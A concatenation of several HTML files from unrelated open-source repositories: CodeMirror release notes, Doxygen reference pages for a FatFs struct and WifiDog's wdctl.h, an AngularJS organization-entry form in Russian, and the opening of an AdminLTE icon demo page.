<li>Fix a problem where <code>onCursorActivity</code> interfered with <code>onChange</code>.</li>
<li>Fix a number of scrolling and mouse-click-position glitches.</li>
<li>Pass information about the changed lines to <code>onChange</code>.</li>
<li>Support cmd-up/down on OS X.</li>
<li>Add triple-click line selection.</li>
<li>Don't handle shift when changing the selection through the API.</li>
<li>Support <code>"nocursor"</code> mode for <code>readOnly</code> option.</li>
<li>Add an <code>onHighlightComplete</code> option.</li>
<li>Fix the context menu for Firefox.</li>
</ul>
<p class="rel">28-03-2011: <a href="http://codemirror.net/codemirror-2.0.zip">Version 2.0</a>:</p>
<p class="rel-note">CodeMirror 2 is a complete rewrite that's
faster, smaller, simpler to use, and less dependent on browser
quirks. See <a href="internals.html">this</a>
and <a href="http://groups.google.com/group/codemirror/browse_thread/thread/5a8e894024a9f580">this</a>
for more information.</p>
<p class="rel">22-02-2011: <a href="https://github.com/codemirror/codemirror/tree/beta2">Version 2.0 beta 2</a>:</p>
<p class="rel-note">Somewhat more mature API, lots of bugs shaken out.</p>
<p class="rel">17-02-2011: <a href="http://codemirror.net/codemirror-0.94.zip">Version 0.94</a>:</p>
<ul class="rel-note">
<li><code>tabMode: "spaces"</code> was modified slightly (now indents when something is selected).</li>
<li>Fixes a bug that would cause the selection code to break on some IE versions.</li>
<li>Disabling spell-check on WebKit browsers now works.</li>
</ul>
<p class="rel">08-02-2011: <a href="http://codemirror.net/">Version 2.0 beta 1</a>:</p>
<p class="rel-note">CodeMirror 2 is a complete rewrite of
CodeMirror, no longer depending on an editable frame.</p>
<p class="rel">19-01-2011: <a href="http://codemirror.net/codemirror-0.93.zip">Version 0.93</a>:</p>
<ul class="rel-note">
<li>Added a <a href="contrib/regex/index.html">Regular Expression</a> parser.</li>
<li>Fixes to the PHP parser.</li>
<li>Support for regular expression in search/replace.</li>
<li>Add <code>save</code> method to instances created with <code>fromTextArea</code>.</li>
<li>Add support for MS T-SQL in the SQL parser.</li>
<li>Support use of CSS classes for highlighting brackets.</li>
<li>Fix yet another hang with line-numbering in hidden editors.</li>
</ul>
</section>
<section id=v1>
<h2>Version 0.x</h2>
<p class="rel">28-03-2011: <a href="http://codemirror.net/codemirror-1.0.zip">Version 1.0</a>:</p>
<ul class="rel-note">
<li>Fix error when debug history overflows.</li>
<li>Refine handling of C# verbatim strings.</li>
<li>Fix some issues with JavaScript indentation.</li>
</ul>
<p class="rel">17-12-2010: <a href="http://codemirror.net/codemirror-0.92.zip">Version 0.92</a>:</p>
<ul class="rel-note">
<li>Make CodeMirror work in XHTML documents.</li>
<li>Fix bug in handling of backslashes in Python strings.</li>
<li>The <code>styleNumbers</code> option is now officially
supported and documented.</li>
<li><code>onLineNumberClick</code> option added.</li>
<li>More consistent names <code>onLoad</code> and
<code>onCursorActivity</code> callbacks. Old names still work, but
are deprecated.</li>
<li>Add a <a href="contrib/freemarker/index.html">Freemarker</a> mode.</li>
</ul>
<p class="rel">11-11-2010: <a
href="http://codemirror.net/codemirror-0.91.zip">Version 0.91</a>:</p>
<ul class="rel-note">
<li>Adds support for <a href="contrib/java">Java</a>.</li>
<li>Small additions to the <a href="contrib/php">PHP</a> and <a href="contrib/sql">SQL</a> parsers.</li>
<li>Work around various <a href="https://bugs.webkit.org/show_bug.cgi?id=47806">Webkit</a> <a href="https://bugs.webkit.org/show_bug.cgi?id=23474">issues</a>.</li>
<li>Fix <code>toTextArea</code> to update the code in the textarea.</li>
<li>Add a <code>noScriptCaching</code> option (hack to ease development).</li>
<li>Make sub-modes of <a href="mixedtest.html">HTML mixed</a> mode configurable.</li>
</ul>
<p class="rel">02-10-2010: <a
href="http://codemirror.net/codemirror-0.9.zip">Version 0.9</a>:</p>
<ul class="rel-note">
<li>Add support for searching backwards.</li>
<li>There are now parsers for <a href="contrib/scheme/index.html">Scheme</a>, <a href="contrib/xquery/index.html">XQuery</a>, and <a href="contrib/ometa/index.html">OmetaJS</a>.</li>
<li>Makes <code>height: "dynamic"</code> more robust.</li>
<li>Fixes bug where paste did not work on OS X.</li>
<li>Add a <code>enterMode</code> and <code>electricChars</code> options to make indentation even more customizable.</li>
<li>Add <code>firstLineNumber</code> option.</li>
<li>Fix bad handling of <code>@media</code> rules by the CSS parser.</li>
<li>Take a new, more robust approach to working around the invisible-last-line bug in WebKit.</li>
</ul>
<p class="rel">22-07-2010: <a
href="http://codemirror.net/codemirror-0.8.zip">Version 0.8</a>:</p>
<ul class="rel-note">
<li>Add a <code>cursorCoords</code> method to find the screen
coordinates of the cursor.</li>
<li>A number of fixes and support for more syntax in the PHP parser.</li>
<li>Fix indentation problem with JSON-mode JS parser in Webkit.</li>
<li>Add a <a href="compress.html">minification</a> UI.</li>
<li>Support a <code>height: dynamic</code> mode, where the editor's
height will adjust to the size of its content.</li>
<li>Better support for IME input mode.</li>
<li>Fix JavaScript parser getting confused when seeing a no-argument
function call.</li>
<li>Have CSS parser see the difference between selectors and other
identifiers.</li>
<li>Fix scrolling bug when pasting in a horizontally-scrolled
editor.</li>
<li>Support <code>toTextArea</code> method in instances created with
<code>fromTextArea</code>.</li>
<li>Work around new Opera cursor bug that causes the cursor to jump
when pressing backspace at the end of a line.</li>
</ul>
<p class="rel">27-04-2010: <a
href="http://codemirror.net/codemirror-0.67.zip">Version
0.67</a>:</p>
<p class="rel-note">More consistent page-up/page-down behaviour
across browsers. Fix some issues with hidden editors looping forever
when line-numbers were enabled. Make PHP parser parse
<code>"\\"</code> correctly. Have <code>jumpToLine</code> work on
line handles, and add <code>cursorLine</code> function to fetch the
line handle where the cursor currently is. Add new
<code>setStylesheet</code> function to switch style-sheets in a
running editor.</p>
<p class="rel">01-03-2010: <a
href="http://codemirror.net/codemirror-0.66.zip">Version
0.66</a>:</p>
<p class="rel-note">Adds <code>removeLine</code> method to API.
Introduces the <a href="contrib/plsql/index.html">PLSQL parser</a>.
Marks XML errors by adding (rather than replacing) a CSS class, so
that they can be disabled by modifying their style. Fixes several
selection bugs, and a number of small glitches.</p>
<p class="rel">12-11-2009: <a
href="http://codemirror.net/codemirror-0.65.zip">Version
0.65</a>:</p>
<p class="rel-note">Add support for having both line-wrapping and
line-numbers turned on, make paren-highlighting style customisable
(<code>markParen</code> and <code>unmarkParen</code> config
options), work around a selection bug that Opera
<em>re</em>introduced in version 10.</p>
<p class="rel">23-10-2009: <a
href="http://codemirror.net/codemirror-0.64.zip">Version
0.64</a>:</p>
<p class="rel-note">Solves some issues introduced by the
paste-handling changes from the previous release. Adds
<code>setSpellcheck</code>, <code>setTextWrapping</code>,
<code>setIndentUnit</code>, <code>setUndoDepth</code>,
<code>setTabMode</code>, and <code>setLineNumbers</code> to
customise a running editor. Introduces an <a
href="contrib/sql/index.html">SQL</a> parser. Fixes a few small
problems in the <a href="contrib/python/index.html">Python</a>
parser. And, as usual, add workarounds for various newly discovered
browser incompatibilities.</p>
<p class="rel">31-08-2009: <a href="http://codemirror.net/codemirror-0.63.zip">Version 0.63</a>:</p>
<p class="rel-note"> Overhaul of paste-handling (less fragile), fixes for several
serious IE8 issues (cursor jumping, end-of-document bugs) and a number
of small problems.</p>
<p class="rel">30-05-2009: <a href="http://codemirror.net/codemirror-0.62.zip">Version 0.62</a>:</p>
<p class="rel-note">Introduces <a href="contrib/python/index.html">Python</a>
and <a href="contrib/lua/index.html">Lua</a> parsers. Add
<code>setParser</code> (on-the-fly mode changing) and
<code>clearHistory</code> methods. Make parsing passes time-based
instead of lines-based (see the <code>passTime</code> option).</p>
</section>
</article>
|
docs/api/html/df/dab/structFIL.html
|
kammce/SJSU-DEV-Linux
|
<!-- HTML header for doxygen 1.8.8-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<!-- For Mobile Devices -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta name="generator" content="Doxygen 1.8.11"/>
<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.1.min.js"></script>
<title>SJSU One API: FIL Struct Reference</title>
<!--<link href="../../tabs.css" rel="stylesheet" type="text/css"/>-->
<script type="text/javascript" src="../../dynsections.js"></script>
<link href="../../search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="../../search/searchdata.js"></script>
<script type="text/javascript" src="../../search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { init_search(); });
</script>
<link href="../../doxygen.css" rel="stylesheet" type="text/css" />
<link href="../../customdoxygen.css" rel="stylesheet" type="text/css"/>
<link href='https://fonts.googleapis.com/css?family=Roboto+Slab' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/css/bootstrap.min.css">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/js/bootstrap.min.js"></script>
<script type="text/javascript" src="../../doxy-boot.js"></script>
</head>
<body>
<nav class="navbar navbar-default" role="navigation">
<div class="container">
<div class="navbar-header">
<a class="navbar-brand">SJSU One API </a>
</div>
</div>
</nav>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div class="content" id="content">
<div class="container">
<div class="row">
<div class="col-sm-12 panel " style="padding-bottom: 15px;">
<div style="margin-bottom: 15px;">
<!-- end header part --><!-- Generated by Doxygen 1.8.11 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "../../search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="../../index.html"><span>Main Page</span></a></li>
<li><a href="../../modules.html"><span>Modules</span></a></li>
<li><a href="../../namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="../../annotated.html"><span>Data Structures</span></a></li>
<li><a href="../../files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="../../search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="../../search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="../../annotated.html"><span>Data Structures</span></a></li>
<li><a href="../../classes.html"><span>Data Structure Index</span></a></li>
<li><a href="../../inherits.html"><span>Class Hierarchy</span></a></li>
<li><a href="../../functions.html"><span>Data Fields</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-attribs">Data Fields</a> </div>
<div class="headertitle">
<div class="title">FIL Struct Reference</div> </div>
</div><!--header-->
<div class="contents">
<p><code>#include <<a class="el" href="../../da/db9/ff_8h_source.html">ff.h</a>></code></p>
<div class="dynheader">
Collaboration diagram for FIL:</div>
<div class="dyncontent">
<div class="center"><img src="../../d1/dae/structFIL__coll__graph.png" border="0" usemap="#FIL_coll__map" alt="Collaboration graph"/></div>
<map name="FIL_coll__map" id="FIL_coll__map">
<area shape="rect" id="node2" href="../../db/d75/structFATFS.html" title="FATFS" alt="" coords="5,5,69,32"/>
</map>
<center><span class="legend">[<a href="../../graph_legend.html">legend</a>]</span></center></div>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-attribs"></a>
Data Fields</h2></td></tr>
<tr class="memitem:a42376a6797a06228911c8b836c1e9030"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../db/d75/structFATFS.html">FATFS</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#a42376a6797a06228911c8b836c1e9030">fs</a></td></tr>
<tr class="separator:a42376a6797a06228911c8b836c1e9030"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:af7cae0063b0045fb7078b560101ba8f2"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#a197942eefa7db30960ae396d68339b97">WORD</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#af7cae0063b0045fb7078b560101ba8f2">id</a></td></tr>
<tr class="separator:af7cae0063b0045fb7078b560101ba8f2"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ac409508881f5a16f2998ae675072b376"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#a4ae1dab0fb4b072a66584546209e7d58">BYTE</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#ac409508881f5a16f2998ae675072b376">flag</a></td></tr>
<tr class="separator:ac409508881f5a16f2998ae675072b376"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:aea440945db26de9c4a88065c0c887fda"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#a4ae1dab0fb4b072a66584546209e7d58">BYTE</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#aea440945db26de9c4a88065c0c887fda">err</a></td></tr>
<tr class="separator:aea440945db26de9c4a88065c0c887fda"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a75d29cf9257c827d117887b9f924c4a9"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#a75d29cf9257c827d117887b9f924c4a9">fptr</a></td></tr>
<tr class="separator:a75d29cf9257c827d117887b9f924c4a9"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:aa00790d40d7b0081c345fd4f76e22b70"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#aa00790d40d7b0081c345fd4f76e22b70">fsize</a></td></tr>
<tr class="separator:aa00790d40d7b0081c345fd4f76e22b70"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ad308b74c8d6975c6a9c30d90b4124c40"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#ad308b74c8d6975c6a9c30d90b4124c40">sclust</a></td></tr>
<tr class="separator:ad308b74c8d6975c6a9c30d90b4124c40"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:aa41312aba551b9a6d1c9d3c8c7d2734b"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#aa41312aba551b9a6d1c9d3c8c7d2734b">clust</a></td></tr>
<tr class="separator:aa41312aba551b9a6d1c9d3c8c7d2734b"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ab3d4165d6fd32ac71a130d835fbf0b4d"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#ab3d4165d6fd32ac71a130d835fbf0b4d">dsect</a></td></tr>
<tr class="separator:ab3d4165d6fd32ac71a130d835fbf0b4d"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ab203794f939ad4480e81dfa488770783"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#ab203794f939ad4480e81dfa488770783">dir_sect</a></td></tr>
<tr class="separator:ab203794f939ad4480e81dfa488770783"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a5af9e9fb312b629220eaf684dd28c4a9"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#a4ae1dab0fb4b072a66584546209e7d58">BYTE</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#a5af9e9fb312b629220eaf684dd28c4a9">dir_ptr</a></td></tr>
<tr class="separator:a5af9e9fb312b629220eaf684dd28c4a9"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:a7a95fb86588663e48309b5cded7e207b"><td class="memItemLeft" align="right" valign="top"><a class="el" href="../../d6/d3d/integer_8h.html#a4ae1dab0fb4b072a66584546209e7d58">BYTE</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="../../df/dab/structFIL.html#a7a95fb86588663e48309b5cded7e207b">buf</a> [<a class="el" href="../../de/d51/ffconf_8h.html#ac271b697378912f17132cb9c7d0de024">_MAX_SS</a>]</td></tr>
<tr class="separator:a7a95fb86588663e48309b5cded7e207b"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<h2 class="groupheader">Field Documentation</h2>
<a class="anchor" id="a7a95fb86588663e48309b5cded7e207b"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#a4ae1dab0fb4b072a66584546209e7d58">BYTE</a> FIL::buf[<a class="el" href="../../de/d51/ffconf_8h.html#ac271b697378912f17132cb9c7d0de024">_MAX_SS</a>]</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="aa41312aba551b9a6d1c9d3c8c7d2734b"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> FIL::clust</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="a5af9e9fb312b629220eaf684dd28c4a9"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#a4ae1dab0fb4b072a66584546209e7d58">BYTE</a>* FIL::dir_ptr</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="ab203794f939ad4480e81dfa488770783"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> FIL::dir_sect</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="ab3d4165d6fd32ac71a130d835fbf0b4d"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> FIL::dsect</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="aea440945db26de9c4a88065c0c887fda"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#a4ae1dab0fb4b072a66584546209e7d58">BYTE</a> FIL::err</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="ac409508881f5a16f2998ae675072b376"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#a4ae1dab0fb4b072a66584546209e7d58">BYTE</a> FIL::flag</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="a75d29cf9257c827d117887b9f924c4a9"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> FIL::fptr</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="a42376a6797a06228911c8b836c1e9030"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../db/d75/structFATFS.html">FATFS</a>* FIL::fs</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="aa00790d40d7b0081c345fd4f76e22b70"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> FIL::fsize</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="af7cae0063b0045fb7078b560101ba8f2"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#a197942eefa7db30960ae396d68339b97">WORD</a> FIL::id</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<a class="anchor" id="ad308b74c8d6975c6a9c30d90b4124c40"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="../../d6/d3d/integer_8h.html#ad342ac907eb044443153a22f964bf0af">DWORD</a> FIL::sclust</td>
</tr>
</table>
</div><div class="memdoc">
</div>
</div>
<hr/>The documentation for this struct was generated from the following file:<ul>
<li>/var/www/html/SJSU-DEV-Linux/firmware/default/lib/L4_IO/fat/<a class="el" href="../../da/db9/ff_8h_source.html">ff.h</a></li>
</ul>
</div><!-- contents -->
<!-- HTML footer for doxygen 1.8.8-->
<!-- start footer part -->
</div>
</div>
</div>
</div>
</div>
<hr class="footer"/><address class="footer"><small>
Generated by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="../../doxygen.png" alt="doxygen"/>
</a> 1.8.11
</small></address>
</body>
</html>
|
doc/html/wifidog-1_81_83__rc1_2src_2wdctl_8h-source.html
|
sxpert/wifidog-ffw
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>WifiDog: wdctl.h Source File</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
<link href="tabs.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.5.1 -->
<div class="tabs">
<ul>
<li><a href="main.html"><span>Main Page</span></a></li>
<li><a href="annotated.html"><span>Data Structures</span></a></li>
<li id="current"><a href="files.html"><span>Files</span></a></li>
</ul></div>
<h1>wdctl.h</h1><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">/********************************************************************\</span>
<a name="l00002"></a>00002 <span class="comment"> * This program is free software; you can redistribute it and/or *</span>
<a name="l00003"></a>00003 <span class="comment"> * modify it under the terms of the GNU General Public License as *</span>
<a name="l00004"></a>00004 <span class="comment"> * published by the Free Software Foundation; either version 2 of *</span>
<a name="l00005"></a>00005 <span class="comment"> * the License, or (at your option) any later version. *</span>
<a name="l00006"></a>00006 <span class="comment"> * *</span>
<a name="l00007"></a>00007 <span class="comment"> * This program is distributed in the hope that it will be useful, *</span>
<a name="l00008"></a>00008 <span class="comment"> * but WITHOUT ANY WARRANTY; without even the implied warranty of *</span>
<a name="l00009"></a>00009 <span class="comment"> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *</span>
<a name="l00010"></a>00010 <span class="comment"> * GNU General Public License for more details. *</span>
<a name="l00011"></a>00011 <span class="comment"> * *</span>
<a name="l00012"></a>00012 <span class="comment"> * You should have received a copy of the GNU General Public License*</span>
<a name="l00013"></a>00013 <span class="comment"> * along with this program; if not, contact: *</span>
<a name="l00014"></a>00014 <span class="comment"> * *</span>
<a name="l00015"></a>00015 <span class="comment"> * Free Software Foundation Voice: +1-617-542-5942 *</span>
<a name="l00016"></a>00016 <span class="comment"> * 59 Temple Place - Suite 330 Fax: +1-617-542-2652 *</span>
<a name="l00017"></a>00017 <span class="comment"> * Boston, MA 02111-1307, USA gnu@gnu.org *</span>
<a name="l00018"></a>00018 <span class="comment"> * *</span>
<a name="l00019"></a>00019 <span class="comment">\********************************************************************/</span>
<a name="l00020"></a>00020
<a name="l00021"></a>00021 <span class="comment">/* $Id: wdctl.h 901 2006-01-17 18:58:13Z mina $ */</span>
<a name="l00027"></a>00027 <span class="preprocessor">#ifndef _WDCTL_H_</span>
<a name="l00028"></a>00028 <span class="preprocessor"></span><span class="preprocessor">#define _WDCTL_H_</span>
<a name="l00029"></a>00029 <span class="preprocessor"></span>
<a name="l00030"></a>00030 <span class="preprocessor">#define DEFAULT_SOCK "/tmp/wdctl.sock"</span>
<a name="l00031"></a>00031 <span class="preprocessor"></span>
<a name="l00032"></a>00032 <span class="preprocessor">#define WDCTL_UNDEF 0</span>
<a name="l00033"></a>00033 <span class="preprocessor"></span><span class="preprocessor">#define WDCTL_STATUS 1</span>
<a name="l00034"></a>00034 <span class="preprocessor"></span><span class="preprocessor">#define WDCTL_STOP 2</span>
<a name="l00035"></a>00035 <span class="preprocessor"></span><span class="preprocessor">#define WDCTL_KILL 3</span>
<a name="l00036"></a>00036 <span class="preprocessor"></span><span class="preprocessor">#define WDCTL_RESTART 4</span>
<a name="l00037"></a>00037 <span class="preprocessor"></span>
<a name="l00038"></a>00038 <span class="keyword">typedef</span> <span class="keyword">struct </span>{
<a name="l00039"></a><a class="code" href="structs__config.html#d331abd0de5c051099d862891f454e7a">00039</a> <span class="keywordtype">char</span> *socket;
<a name="l00040"></a>00040 <span class="keywordtype">int</span> command;
<a name="l00041"></a><a class="code" href="structs__config.html#0d3b219bafe97bb489549dcdd334b074">00041</a> <span class="keywordtype">char</span> *param;
<a name="l00042"></a>00042 } <a class="code" href="structs__config.html">s_config</a>;
<a name="l00043"></a>00043 <span class="preprocessor">#endif</span>
</pre></div><hr size="1"><address style="align: right;"><small>Generated on Sun Jun 24 00:29:52 2007 for WifiDog by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.5.1 </small></address>
</body>
</html>
|
client/views/org/create.html
|
GT-Volk/DomainList
|
<div>
<h1>Добавление организации</h1>
<p>{{ message}}</p>
<form role="form" name="myForm">
<div class="form-group" ng-class="{error: myForm.name.$invalid}">
<label>Название:</label>
<div>
<input name="name" ng-model="org.name" type="text" class="form-control" placeholder="Название организации" required/>
<span ng-show="myForm.name.$dirty && myForm.name.$invalid" class="help-inline">Название обязательно</span>
</div>
</div>
<div class="form-group" ng-class="{error: myForm.url.$invalid}">
<label>URL:</label>
<div>
<input name="url" ng-model="org.url" type="text" class="form-control" placeholder="URL адрес" required/>
<span ng-show="myForm.url.$dirty && myForm.url.$invalid" class="help-inline">URL обязательно</span>
</div>
</div>
<div class="form-group" ng-class="{error: myForm.login.$invalid}">
<label>Логин:</label>
<div>
<input name="login" ng-model="org.login" type="text" class="form-control" placeholder="Логин" required/>
<span ng-show="myForm.login.$dirty && myForm.login.$invalid" class="help-inline">Логин обязателен</span>
</div>
</div>
<div class="form-group" ng-class="{error: myForm.password.$invalid}">
<label>Пароль:</label>
<div>
<input name="password" ng-model="org.password" type="text" class="form-control" placeholder="Пароль" required/>
<span ng-show="myForm.password.$dirty && myForm.password.$invalid" class="help-inline">Пароль обязателен</span>
</div>
</div>
<div class="form-group" ng-class="{error: myForm.dogovor.$invalid}">
<label>Номер договора:</label>
<div>
<input name="dogovor" ng-model="org.dogovor" type="text" class="form-control" placeholder="Номер договора" required/>
<span ng-show="myForm.dogovor.$dirty && myForm.dogovor.$invalid" class="help-inline">Номер договора обязателен</span>
</div>
</div>
<div class="form-group" ng-class="{error: myForm.info.$invalid}">
<label>Описание:</label>
<div>
<input name="info" ng-model="org.info" type="text" class="form-control" placeholder="Описание" required/>
<span ng-show="myForm.info.$dirty && myForm.info.$invalid" class="help-inline">Описание</span>
</div>
</div>
<a href="#/org/index" class="btn btn-default">Cancel</a>
<button ng-click="createOrg(org);"
ng-disabled="myForm.$invalid"
type="submit" class="btn btn-default">Submit
</button>
</form>
</div>
|
demo_pages/UI/icons.html
|
PIELab/behaviorSim_web
|
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>AdminLTE | Dashboard</title>
<meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no' name='viewport'>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet" type="text/css" />
<link href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.1.0/css/font-awesome.min.css" rel="stylesheet" type="text/css" />
<!-- Ionicons -->
<link href="//code.ionicframework.com/ionicons/1.5.2/css/ionicons.min.css" rel="stylesheet" type="text/css" />
<!-- Theme style -->
<link href="../../css/AdminLTE.css" rel="stylesheet" type="text/css" />
<!-- demo style -->
<style type="text/css">
/* FROM HTTP://WWW.GETBOOTSTRAP.COM
* Glyphicons
*
* Special styles for displaying the icons and their classes in the docs.
*/
.bs-glyphicons {
padding-left: 0;
padding-bottom: 1px;
margin-bottom: 20px;
list-style: none;
overflow: hidden;
}
.bs-glyphicons li {
float: left;
width: 25%;
height: 115px;
padding: 10px;
margin: 0 -1px -1px 0;
font-size: 12px;
